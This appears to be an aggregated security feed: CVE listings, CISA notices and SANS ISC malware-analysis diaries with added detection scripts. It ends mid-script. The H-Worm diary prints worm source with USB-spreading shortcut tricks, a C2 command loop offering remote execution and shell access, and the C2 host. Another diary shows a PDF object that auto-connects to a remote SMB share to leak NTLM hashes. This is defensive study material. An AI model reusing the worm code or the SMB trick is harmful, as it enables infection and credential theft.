wordpress — wordpress Vulnerability in Easy2map-photos WordPress Plugin v1.09 MapPinImageUpload.php and MapPinIconSave.php allows path traversal when specifying file names creating files outside of the upload directory. 2019-02-15 not yet calculated CVE-2015-4617
MISC
MISC
wordpress — wordpress
 
Vulnerability in Easy2map-photos WordPress Plugin v1.09 allows SQL Injection via unsanitized mapTemplateName, mapName, mapSettingsXML, parentCSSXML, photoCSSXML, mapCSSXML, mapHTML,mapID variables 2019-02-15 not yet calculated CVE-2015-4615
MISC
MISC
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. There is authenticated remote command execution. 2019-02-10 not yet calculated CVE-2018-20767
CONFIRM
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. An attacker can execute PHP code by leveraging a writable file. 2019-02-10 not yet calculated CVE-2018-20768
CONFIRM
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. There is a Local File Inclusion vulnerability. 2019-02-10 not yet calculated CVE-2018-20769
CONFIRM
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. There is unauthenticated Remote Command Execution. 2019-02-10 not yet calculated CVE-2018-20771
CONFIRM
xerox — workcentre
 
An issue was discovered on Xerox WorkCentre 3655, 3655i, 58XX, 58XXi, 59XX, 59XXi, 6655, 6655i, 72XX, 72XXi, 78XX, 78XXi, 7970, 7970i, EC7836, and EC7856 devices before R18-05 073.xxx.0487.15000. There is Blind SQL Injection. 2019-02-10 not yet calculated CVE-2018-20770
CONFIRM
yingzhi — python_programming_language Vulnerability in YingZhi Python Programming Language v1.9 allows arbitrary anonymous uploads to the phone’s storage 2019-02-15 not yet calculated CVE-2013-5654
MISC
MISC
yokogawa — multiple_products License Manager Service of YOKOGAWA products (CENTUM VP (R5.01.00 – R6.06.00), CENTUM VP Entry Class (R5.01.00 – R6.06.00), ProSafe-RS (R3.01.00 – R4.04.00), PRM (R4.01.00 – R4.02.00), B/M9000 VP(R7.01.01 – R8.02.03)) allows remote attackers to bypass access restriction to send malicious files to the PC where License Manager Service runs via unspecified vectors. 2019-02-13 not yet calculated CVE-2019-5909
MISC
BID
MISC
zoho_manageengine — servicedesk_plus Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10012 allows remote attackers to upload arbitrary files via login page customization. 2019-02-16 not yet calculated CVE-2019-8394
CONFIRM
zoho_manageengine — servicedesk_plus An Insecure Direct Object Reference (IDOR) vulnerability exists in Zoho ManageEngine ServiceDesk Plus (SDP) before 10.0 build 10007 via an attachment to a request. 2019-02-16 not yet calculated CVE-2019-8395
CONFIRM



This product is provided subject to this Notification and this Privacy & Use policy.

Special Webcast: The SANS ICS Summit 2019 and What to Expect – February 18, 2019 1:00pm US/Eastern

This post was originally published on this site

Speakers: Robert M. Lee, Tim Conway

Join Robert M. Lee and Tim Conway as they discuss and highlight upcoming ICS talks and exciting networking opportunities at the SANS ICS Security Summit 2019. Now in its 14th year, the annual ICS Security Summit brings together practitioners and leading experts to share ideas, methods, and techniques for defending control system environments. In-depth presentations and interactive panel discussions deliver real-world approaches that work and make a difference for the individuals fighting this fight every day.

The ICS Security Summit will address a wide range of topics, including:

  • Understanding what an attack against your organization will look like (deconstructing real-world ICS attacks and technical threats)
  • Live attack demonstrations & the defenses needed to stop them
  • Case studies and success stories
  • System and organizational investment opportunities that reduce attacker effects
  • Future attack vectors on ICS
  • Mitigations – Defenders, governance, and controls


VMware Releases Security Updates


Original release date: February 15, 2019

VMware has released security updates to address a vulnerability affecting multiple VMware products. An attacker could exploit this vulnerability to take control of an affected system.  

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review VMware Security Advisory VMSA-2019-0001 and apply the necessary updates.



Old H-Worm Delivered Through GitHub, (Thu, Feb 14th)


Another piece of malicious code spotted on GitHub this time. By the way, this is the perfect example to demonstrate that protecting users via a proxy with web-categorization is useless… Even sites from the Alexa Top-1M may deliver malicious content (GitHub’s current position is 51[1]). The URL was found in a classic email phishing attempt. The content had been uploaded recently (<24h) when I found it:

hxxps://raw.githubusercontent[.]com/sidilig/sharing/ebk-ci/Ebanking.zip

Let’s have a look at the archive content:

ISC $ shasum -a 256 Ebanking.zip
abb244010410ce6012bac9e4fc902432cfebe06724d014c63d9ef21f0a6b8b78  Ebanking.zip
ISC $ unzip -t Ebanking.zip
Archive:  Ebanking.zip
    testing: Mesures de sécurité.jar   OK
    testing: Habilitations Ebank.vbs   OK
No errors detected in compressed data of Ebanking.zip.
ISC $ shasum -a 256 *
d4ffa2acdec66f15c2252f36311c059ab00cc942b7cb54c33b4257dbc680ed9b  Habilitations Ebank.vbs
7ab54cb93a4a76dd5578f0b0ddcaeb8420311ebb39f27b62e535a43aec02523a  Mesures de sécurité.jar

Let’s have a look at the VBScript code. It’s based on a big class:

Class Values
   ...
End Class
Set myClass = new Values
myClass.Start()

Most of the code is obfuscated with a simple trick: in the embedded Base64 blob, every letter ‘A’ has been replaced by the two-character marker ‘!@’, which is enough to defeat a naive Base64 decoder. The decoding function substitutes ‘A’ back and only then decodes the data:

Private Function peter_paul(sand, way_off)
  Dim stapler, hp_pc, pillow, ruben
  stapler = "!@"                          ' marker that was substituted for every "A"
  hp_pc = "A"
  pillow = "Q29uc3QgVHlw....."            ' Base64 blob with the "A"s removed (truncated here)
  ruben = Replace(pillow, stapler, hp_pc) ' put the "A"s back
  peter_paul = b642byt_arr(1, ruben, 10)  ' the sample's own Base64 decoder
End Function
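To reproduce that decoding step outside the sample, here is an added Python helper that is not part of the diary or of the sample: it pulls the string literal assigned to pillow out of the VBScript source, substitutes ‘A’ back for ‘!@’ (safe because neither ‘!’ nor ‘@’ belongs to the Base64 alphabet) and Base64-decodes the result. The test input is constructed here with a harmless stand-in second stage; the variable names mirror the sample, and the sample’s own b642byt_arr() is replaced by Python’s base64 module.

```python
import base64
import re

MARKER = "!@"   # the sample's "stapler": the two characters that stand in for every "A"
LETTER = "A"    # the sample's "hp_pc"


def restore_base64(blob: str) -> str:
    """Reverse Replace(pillow, "!@", "A"). Unambiguous: '!' and '@' never occur in Base64."""
    return re.sub(r"\s+", "", blob.replace(MARKER, LETTER))


def decode_stage(blob: str) -> str:
    """Restore the blob and Base64-decode it: the output of peter_paul() + b642byt_arr()."""
    b64 = restore_base64(blob)
    b64 += "=" * (-len(b64) % 4)          # tolerate a blob whose padding was stripped
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def extract_blob(vbs_source: str, var_name: str = "pillow") -> str:
    """Pull the string literal assigned to `var_name` out of VBScript source text."""
    m = re.search(rf'\b{re.escape(var_name)}\s*=\s*"([^"]*)"', vbs_source)
    if m is None:
        raise ValueError(f"no string literal assigned to {var_name}")
    return m.group(1)


def obfuscate_like_sample(script: str) -> str:
    """Forward direction, used only to build the constructed test input below."""
    return base64.b64encode(script.encode("utf-8")).decode("ascii").replace(LETTER, MARKER)


# Constructed stand-in for the real dropper: a harmless second stage wrapped the same way.
SECOND_STAGE = 'x = 0 + 1\r\nMsgBox "second stage ran, x=" & x\r\n'
SAMPLE_VBS = (
    "Private Function peter_paul(sand, way_off)\r\n"
    '  stapler = "!@"\r\n'
    '  hp_pc = "A"\r\n'
    '  pillow = "' + obfuscate_like_sample(SECOND_STAGE) + '"\r\n'
    "End Function\r\n"
)

if __name__ == "__main__":
    print(decode_stage(extract_blob(SAMPLE_VBS)))
```

Run against a real sample, extract_blob() is the only part that needs adjusting (the variable names are random per build); the substitution and decode do not change.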

This is easy to decode in CyberChef: a Find/Replace of ‘!@’ with ‘A’ followed by ‘From Base64’.

The decoded data is a new script, which the sample then executes:

Public Sub Start()
  Set yhm_pepe = CreateObject("ADODB.Stream")    ' objects used by the Base64 decoder
  Set spike = CreateObject("Microsoft.XMLDOM")
  ' peter_paul() restores the blob; john_conor() decodes it into ojor
  If john_conor(1, peter_paul(0, False)) = ojor Then
    ExecuteGlobal ojor                           ' run the decoded second stage in the global scope
  End If
End Sub

The decoded script is written through the ADODB.Stream object and then executed. Here is what the second stage does. It copies itself to %TEMP%\tGcuACWROu.vbs and installs that copy for persistence. An interesting behaviour: it scans for available removable drives (drive.drivetype = 1)[2] and infects them:

for each drive in filesystemobj.drives
  if drive.isready = true then
    if drive.freespace > 0 then
      if drive.drivetype = 1 then   ' 1 = removable drive
        ' drop a copy of the script on the drive and hide it (attributes 2+4 = hidden + system)
        filesystemobj.copyfile wscript.scriptfullname, drive.path & "\" & installname, true
        if filesystemobj.fileexists(drive.path & "\" & installname) then
          filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
        end if
        ' hide every file in the root and replace it with a .lnk that launches the worm first
        for each file in filesystemobj.getfolder(drive.path & "\").Files
          if not lnkfile then exit for
          if instr(file.name, ".") then
            if lcase(split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
              file.attributes = 2+4
              if ucase(file.name) <> ucase(installname) then
                filename = split(file.name, ".")
                set lnkobj = shellobj.createshortcut(drive.path & "\" & filename(0) & ".lnk")
                lnkobj.windowstyle = 7          ' minimised window
                lnkobj.targetpath = "cmd.exe"
                lnkobj.workingdirectory = ""
                ' cmd /c start <worm> & start <original file> & exit
                lnkobj.arguments = "/c start " & replace(installname, " ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name, " ", chrw(34) & " " & chrw(34)) & "&exit"
                ' borrow the file type's icon so the shortcut looks like the hidden file
                ' (as quoted, the assignment goes to "filleicon" but the test reads "fileicon",
                '  so the registry value is never used and the icon always comes from file.path)
                filleicon = shellobj.regread("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, "."))) & "\") & "\defaulticon")
                if instr(fileicon, ",") = 0 then
                  lnkobj.iconlocation = file.path
                else
                  lnkobj.iconlocation = fileicon
                end if
                lnkobj.save()
              end if
            end if
          end if
        next
      end if
    end if
  end if
next

When the installation is successful, it starts communicating with the C2 server at hxxp://ghanaandco.sytes[.]net:3007. The host fingerprint travels in the User-Agent header, with fields separated by ‘<|>’:

POST /is-ready HTTP/1.1
Accept: */*
Accept-Language: fr-be
User-Agent: 647B5904<|>PLAYBOX1<|>Xavier<|>Microsoft Windows XP Professional<|>plus<|>nan-av<|>false - 15/02/2019
Accept-Encoding: gzip, deflate
Host: ghanaandco.sytes.net:3007
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Here is a reply from the C2 server:

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Content-Length: 12
Server: Indy/9.0.18

sleep<|>5000

Here is the main loop waiting for commands:

while true
  install                           ' re-establish persistence on every pass
  response = ""
  response = post("is-ready", "")   ' beacon; the reply is "<command><|><argument>..."
  cmd = split(response, spliter)    ' spliter = "<|>"
  select case cmd(0)
    case "excecute"                 ' sic: the command name is misspelled in the protocol
      param = cmd(1)
      execute param                 ' run arbitrary VBScript sent by the C2
    case "update"
      param = cmd(1)
      oneonce.close
      set oneonce = filesystemobj.opentextfile(installdir & installname, 2, false)
      oneonce.write param           ' overwrite itself with the new script and restart
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit
    case "uninstall"
      uninstall
    case "send"
      download cmd(1), cmd(2)
    case "site-send"
      sitedownloader cmd(1), cmd(2)
    case "recv"
      param = cmd(1)
      upload(param)
    case "enum-driver"
      post "is-enum-driver", enumdriver
    case "enum-faf"
      param = cmd(1)
      post "is-enum-faf", enumfaf(param)
    case "enum-process"
      post "is-enum-process", enumprocess
    case "cmd-shell"
      param = cmd(1)
      post "is-cmd-shell", cmdshell(param)
    case "delete"
      param = cmd(1)
      deletefaf(param)
    case "exit-process"
      param = cmd(1)
      exitprocess(param)
    case "sleep"
      param = cmd(1)
      sleep = eval(param)           ' new polling interval in ms (cf. the "sleep<|>5000" reply above)
  end select
  wscript.sleep sleep
wend
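The beacon format and the command grammar above are simple enough to parse, which is useful both for triage and for hunting in proxy logs. The following Python is an added example, not code from the diary or from the worm: it splits an H-Worm User-Agent into its fields, mirrors the split(response, spliter) dispatch on a C2 reply, and scans constructed proxy log lines for the POST /is-* beacons. Only the hostname, username and OS positions are unambiguous from the captured User-Agent; the other field names (volume_serial, tag, antivirus, usb_spreading) are assumptions, as are the log line format and the filler lines.

```python
from typing import Dict, List, Optional, Tuple

SPLITTER = "<|>"

# Field names are assumptions based on the beacon shown in the diary; only hostname,
# username and os are unambiguous from the captured value.
BEACON_FIELDS = ("volume_serial", "hostname", "username", "os", "tag", "antivirus", "usb_spreading")

KNOWN_COMMANDS = {"excecute", "update", "uninstall", "send", "site-send", "recv",
                  "enum-driver", "enum-faf", "enum-process", "cmd-shell",
                  "delete", "exit-process", "sleep"}


def parse_beacon_user_agent(ua: str) -> Optional[Dict[str, str]]:
    """Split an H-Worm User-Agent into fields; None if the header is not one."""
    parts = ua.split(SPLITTER)
    if len(parts) != len(BEACON_FIELDS):
        return None
    info = dict(zip(BEACON_FIELDS, (p.strip() for p in parts)))
    # the last field carries "<flag> - <dd/mm/yyyy>"
    flag, sep, date = info["usb_spreading"].partition(" - ")
    if sep:
        info["usb_spreading"], info["date"] = flag.strip(), date.strip()
    return info


def parse_c2_reply(body: str) -> Tuple[str, List[str]]:
    """Mirror of `cmd = split(response, spliter)` in the main loop."""
    parts = body.split(SPLITTER)
    return parts[0], parts[1:]


def classify_reply(body: str) -> str:
    """Say what the main loop would do with a given C2 reply."""
    cmd, args = parse_c2_reply(body)
    if cmd not in KNOWN_COMMANDS:
        return "unknown command, ignored by the select case"
    if cmd == "sleep":
        # the sample runs eval(param): anything that is not a number is evaluated as VBScript
        if args and args[0].isdigit():
            return "sleep %s ms" % args[0]
        return "sleep with non-numeric argument (eval of attacker data)"
    return cmd


# Constructed proxy log lines: "<client> <method> <host:port> <path> <user-agent>".
# Line 2 reuses the beacon and C2 host shown in the diary; lines 1 and 3 are benign filler.
SAMPLE_LOG = [
    "10.0.0.23 GET www.example.org:80 /index.html Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/65.0",
    "10.0.0.23 POST ghanaandco.sytes.net:3007 /is-ready 647B5904<|>PLAYBOX1<|>Xavier<|>Microsoft Windows XP Professional<|>plus<|>nan-av<|>false - 15/02/2019",
    "10.0.0.42 POST api.example.org:443 /is-ready-check Mozilla/5.0 (compatible; HealthChecker/1.0)",
]


def find_beacons(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per H-Worm beacon: a POST to /is-* whose User-Agent parses as a beacon."""
    hits = []
    for line in lines:
        parts = line.split(" ", 4)
        if len(parts) < 5:
            continue
        client, method, host, path, ua = parts
        info = parse_beacon_user_agent(ua)
        if info is None or method != "POST" or not path.startswith("/is-"):
            continue
        info.update(client=client, c2=host, endpoint=path)
        hits.append(info)
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
    print(classify_reply("sleep<|>5000"))
```

Matching on the User-Agent shape (six ‘<|>’ separators) rather than on the C2 hostname is deliberate: the dynamic-DNS name changes between campaigns, the beacon format has not since 2013.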

Even if the delivery method has changed, the malicious code is not new: this is the good old H-Worm, already documented in 2013[3]. Old stuff, but still used in the wild!

[1] https://www.alexa.com/siteinfo/github.com
[2] https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/drivetype-property
[3] https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Mozilla Releases Security Update for Thunderbird


Original release date: February 14, 2019

Mozilla has released a security update to address vulnerabilities in Thunderbird. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Thunderbird 60.5.1 and apply the necessary update.



Suspicious PDF Connecting to a Remote SMB Share, (Thu, Feb 14th)


Yesterday I stumbled upon a PDF file that was flagged as suspicious by a customer’s anti-malware solution and placed in quarantine. Later, the recipient contacted the team in charge of email to get access to his document because he knew the sender and claimed that the file was legit.

The file looked indeed safe and the content was properly related to the customer’s business. I did a quick analysis of the file in my sandbox and, once the file opened, Acrobat Reader attempted to connect to a remote SMB share. I extracted the objects from the PDF file and there was indeed a reference to an SMB share. When you ask a Windows computer to connect to such a service, you immediately think about NTLM hash leakage: the SMB client transparently tries to authenticate to the remote host, handing the attacker an NTLM challenge-response that can be cracked offline or relayed.

Here is the object extracted from the PDF:

obj 10 0
 Type: /Page
 Referencing: 9 0 R, 6 0 R, 11 0 R, 12 0 R, 13 0 R, 7 0 R, 2 0 R, 14 0 R, 1 0 R, 15 0 R, 16 0 R, 17 0 R, 18 0 R, 3 0 R, 19 0 R, 20 0 R

  <<
    /AA
      <<
        /O
          <<
            /F '(\\virtualofficestorage[.]com\docs_share)'
            /D [ 0 /Fit]
            /S /GoToE
          >>
      >>
    /Parent 9 0 R
    /Contents [6 0 R 11 0 R 12 0 R 13 0 R 7 0 R]
    /Type /Page
    /Resources
      <<
        /ExtGState
          <<
            /Xi1 2 0 R
          >>
        /XObject
          <<
            /BG0 14 0 R
            /Xi0 1 0 R
            /CL 15 0 R
          >>
        /ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
        /Font
          <<
            /F_2 16 0 R
            /F_0 17 0 R
            /F_1 18 0 R
            /Xi2 3 0 R
          >>
      >>
    /MediaBox [0 -0.02000 598.80 844.08]
    /Annots [19 0 R 20 0 R]
  >>
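An added example, not from the diary, showing how to triage a PDF for this pattern without opening it: it scans the raw file for action dictionaries (GoToE, GoToR, Launch, ImportData) whose /F file specification is a UNC path or an smb:/file: URL, and reports whether the action hangs off an /AA trigger that fires on page open rather than on a click, which is exactly the /AA /O /GoToE combination in the object above. The two documents it runs over are constructed here with a placeholder host, files.example.invalid. Objects hidden in compressed object streams would have to be inflated first (for instance with pdf-parser.py or qpdf --qdf); this scanner does not do that.

```python
import re
from typing import Dict, List

# Action types that carry a file specification (/F) and can therefore point at a remote path.
FILE_ACTIONS = ("GoToE", "GoToR", "Launch", "ImportData")
# /AA keys that fire without any click: page open/close, page visible/invisible.
AUTO_TRIGGERS = {"O": "page open", "C": "page close", "PO": "page open",
                 "PC": "page close", "PV": "page visible", "PI": "page invisible"}

DICT_RE = re.compile(r"<<((?:(?!<<|>>).)*)>>", re.DOTALL)           # innermost dictionaries only
ACTION_RE = re.compile(r"/S\s*/(%s)\b" % "|".join(FILE_ACTIONS))
FILESPEC_RE = re.compile(r"/F\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)   # /F given as a literal string
TRIGGER_RE = re.compile(r"/([A-Za-z]+)\s*$")                         # key that owns the dictionary


def unescape_pdf_string(s: str) -> str:
    """Undo the literal-string escapes that matter for paths (octal escapes are not handled)."""
    simple = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f"}
    return re.sub(r"\\(.)", lambda m: simple.get(m.group(1), m.group(1)), s, flags=re.DOTALL)


def is_remote_target(path: str) -> bool:
    p = path.strip()
    return p.startswith("\\\\") or p.startswith("//") or p.lower().startswith(("smb:", "file:"))


def find_remote_file_actions(pdf_bytes: bytes) -> List[Dict[str, str]]:
    """Scan the raw file for file-spec actions whose target is a network path."""
    text = pdf_bytes.decode("latin-1")
    hits = []
    for m in DICT_RE.finditer(text):
        body = m.group(1)
        action, spec = ACTION_RE.search(body), FILESPEC_RE.search(body)
        if not (action and spec):
            continue
        target = unescape_pdf_string(spec.group(1))
        if not is_remote_target(target):
            continue
        owner = TRIGGER_RE.search(text[:m.start()])     # which key this action dict belongs to
        key = owner.group(1) if owner else "?"
        hits.append({"action": action.group(1), "target": target,
                     "trigger": AUTO_TRIGGERS.get(key, "on user interaction (/%s)" % key)})
    return hits


# Constructed test documents (not the customer's file): a page whose open-action points at a UNC
# share on a placeholder host, and a benign one whose GoToR targets a local file.
SUSPICIOUS_PDF = rb"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]
  /AA << /O << /S /GoToE /F (\\\\files.example.invalid\\docs_share) /D [0 /Fit] >> >>
>> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
BENIGN_PDF = rb"""%PDF-1.4
3 0 obj << /Type /Page /AA << /O << /S /GoToR /F (appendix.pdf) /D [0 /Fit] >> >> >> endobj
%%EOF
"""

if __name__ == "__main__":
    for hit in find_remote_file_actions(SUSPICIOUS_PDF):
        print(hit)
```

A hit with trigger "page open" means the user only has to open the document; blocking outbound TCP/445 at the perimeter is what stops the credential leak itself, whatever the reader does with the action.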

The domain virtualofficestorage[.]com[1] resolves to 185.225.17[.]98, located in Romania. Shodan indeed reports an SMB share:

Alas, it no longer responds (last seen on 2019-02-03). A website also runs on this domain; it serves the default Ubuntu Apache welcome page.

I can’t share the file nor the hash, but did you notice the same behaviour with other PDF documents? Do you know more about this domain? (VT has only one reference to the same kind of document[2])
Please share!

[1] https://www.virustotal.com/#/domain/virtualofficestorage.com
[2] https://www.virustotal.com/#/file/746794ca49f497b43eb53a2fb25c4a0b3782002a45f498c047fa07d46cd43592/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


Fake Updates campaign still active in 2019, (Wed, Feb 13th)


Introduction

Last week on 2019-02-06, @baberpervez2 tweeted about a compromised website used by the Fake Updates campaign (link to tweet).  The Fake Updates campaign uses compromised websites that generate traffic to a fake update page.  The type of fake update page depends on your web browser.  Victims would see a fake Flash update page when using Internet Explorer, a fake Chrome update page when using Google Chrome, or a fake Firefox update page when using Firefox.  Victims download JavaScript (.js) files from these pages disguised as browser updates.  The downloaded .js files will instead install malware on a vulnerable Windows host.

Patterns for infection traffic are relatively unchanged since this campaign was first reported on the Malwarebytes blog in April 2018.

I generated an infection from the Fake Updates campaign on Friday 2019-02-09 and again on Monday 2019-02-11.  Both times, the final payload was a Chthonic banking Trojan.  Today’s diary reviews the infection I generated on Monday 2019-02-11.


Shown above:  Flow chart for infection traffic from Monday 2019-02-11.

Screenshots

The following are screenshots of Fake Updates campaign traffic I generated from the initial compromised website at thetechhaus[.]com.


Shown above:  Fake Chrome update page seen when thetechhaus[.]com was viewed in the Chrome web browser.


Shown above:  You can ignore warnings, download, and run the malicious .js file on a vulnerable Windows host.


Shown above:  The .js file shows highly-obfuscated script, which has always been the case for files from this campaign.


Shown above:  Start of the infection chain traffic filtered in Wireshark.


Shown above: Redirect traffic to track.positiverefreshment[.]org that pointed to fake Chrome update page.


Shown above:  Traffic for fake Chrome update page on 3aak.gotguardsecurity[.]com.


Shown above: HTTPS traffic to dl.dropboxusercontent.com that returned a malicious .js file.


Shown above:  Traffic after running the .js file disguised as a Chrome update.


Shown above:  Final payload (Chthonic banking Trojan) persistent on the infected Windows host.

Indicators of Compromise (IoCs)

The following are indicators associated with the infection on Monday 2019-02-11.

Initial compromised site:

  • thetechhaus[.]com

Redirect that led to fake Chrome update page:

  • 81.4.122[.]193 port 80 – track.positiverefreshment[.]org – GET /s_code.js?[3 requests with different strings of characters]

Traffic for fake Chrome update page:

  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/css.css
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome.min.css
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome_logo_2x.png
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome-new.jpg
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/k3k702ZOKiLJc3WVjuplzOgdm0LZdjqr5-oayXSOefg.woff2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/cJZKeOuBrn4kERxqtaUH3VtXRa8TVwTICgirnJhmVJw.woff2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/DXI1ORHCpsQm3Vp6mXoaTegdm0LZdjqr5-oayXSOefg.woff2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/MTP_ySUJH_bn48VBG8sNSugdm0LZdjqr5-oayXSOefg.woff2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /chromefiles/chrome-32.png
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=1
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=2
  • 93.95.100[.]178 port 80 – 3aak.gotguardsecurity[.]com – GET /topic/news.php?h=220&v=620228&z=de11cb81e3af84d1eb577864be7d7f2d&st=3
  • Note: each time I saw a fake update page, the IP address was the same, but the domain was always different.

Download of .js file disguised as Chrome update:

  • port 443 – dl.dropboxusercontent.com – HTTPS traffic

Traffic generated by .js file:

  • 188.165.62[.]40 port 80 – 6145fab0.static.spillpalletonline[.]com – POST /pixel.gif
  • 188.165.62[.]40 port 80 – 6145fab0.static.spillpalletonline[.]com – POST /pixel.gif?ss&ss1img
  • Note: The above domains were also different for each infection.

Post-infection traffic caused by Chthonic banking Trojan:

  • [infected lab host restarted twice]
  • various IP addresses over TCP port 53 – DNS queries for afroamericanec[.]bit
  • 185.229.224[.]120 port 80 – afroamericanec[.]bit – POST /en/
  • 185.229.224[.]120 port 80 – afroamericanec[.]bit – POST /en/www/

Associated malware:

SHA256 hash: 9daa0dec909874316afe7f402e82d408b96b215a3501579849c792ec91cfe750

  • File size: 41,696 bytes
  • File name: Chrome_77.35.js
  • File description: malicious .js file returned from dl.dropboxusercontent.com

SHA256 hash: 4a17789f8a03fb2ec3185322ab879d436470d931e1fb98d0a4b9e5b68cda95ab

  • File size: 406,792 bytes
  • File location: C:\Users\[username]\AppData\Local\Temp\Chrome_77.35.exe
  • File description: Second executable dropped to the infected Windows host (Chthonic)

SHA256 hash: 7356424e04f730c7440f76cd822ff8645693b9835ae6aec4d6840cb1becae45c

  • File size: 406,792 bytes
  • File location: C:\Users\[username]\AppData\Roaming\YCommonFiles\YCommonFiles.com (random names for directory and file name pair)
  • File description: Chthonic executable persistent on the infected Windows host.
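The indicators above rotate hostnames between infections but keep the same URL shapes, so detection should key on those shapes rather than on domains. The following Python is an added example, not part of the diary: it classifies constructed proxy log lines into the stages of the chain (the s_code.js redirect, the news.php fake update page with its 32-hex z parameter, the POST /pixel.gif callback from the .js file, and POSTs to a Namecoin .bit domain for the Chthonic C2) and alerts when one client touches two or more stages. The log line format is assumed, and the lines are constructed from the indicators listed above plus benign filler.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

HEX32 = re.compile(r"[0-9a-f]{32}")


def classify(method: str, host: str, path: str, query: Dict[str, List[str]]) -> Optional[str]:
    """Map one proxy request onto a stage of the chain, or None if it matches nothing."""
    if method == "GET" and path == "/s_code.js" and query:
        return "redirect"                        # track.<domain>/s_code.js?<random string>
    if (method == "GET" and path.endswith("/news.php")
            and {"h", "v", "z"}.issubset(query) and HEX32.fullmatch(query["z"][0])):
        return "fake_update_page"                # /topic/news.php?h=..&v=..&z=<32 hex>[&st=n]
    if method == "POST" and path == "/pixel.gif":
        return "js_callback"                     # POST /pixel.gif[?ss&ss1img] from the .js file
    if method == "POST" and host.rsplit(":", 1)[0].endswith(".bit"):
        return "chthonic_c2"                     # Chthonic C2 on a Namecoin .bit domain
    return None


def parse_line(line: str):
    """Assumed log format: '<timestamp> <client> <method> <url>'."""
    _ts, client, method, url = line.split(" ", 3)
    u = urlsplit(url)
    return client, method, u.netloc.lower(), u.path, parse_qs(u.query, keep_blank_values=True)


def stages_per_client(lines: List[str]) -> Dict[str, List[str]]:
    """Distinct stages seen per client, in order of first appearance."""
    seen: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        client, method, host, path, query = parse_line(line)
        stage = classify(method, host, path, query)
        if stage and stage not in seen[client]:
            seen[client].append(stage)
    return dict(seen)


def alerts(lines: List[str], min_stages: int = 2) -> List[str]:
    """Clients that touched at least `min_stages` distinct stages of the chain."""
    return sorted(c for c, s in stages_per_client(lines).items() if len(s) >= min_stages)


# Constructed log lines: client 10.0.0.5 replays the chain from the IoCs above,
# client 10.0.0.9 only produces look-alike but benign requests.
SAMPLE_LOG = [
    "2019-02-11T14:03:12Z 10.0.0.5 GET http://thetechhaus.com/",
    "2019-02-11T14:03:13Z 10.0.0.5 GET http://track.positiverefreshment.org/s_code.js?Xk3p9qz",
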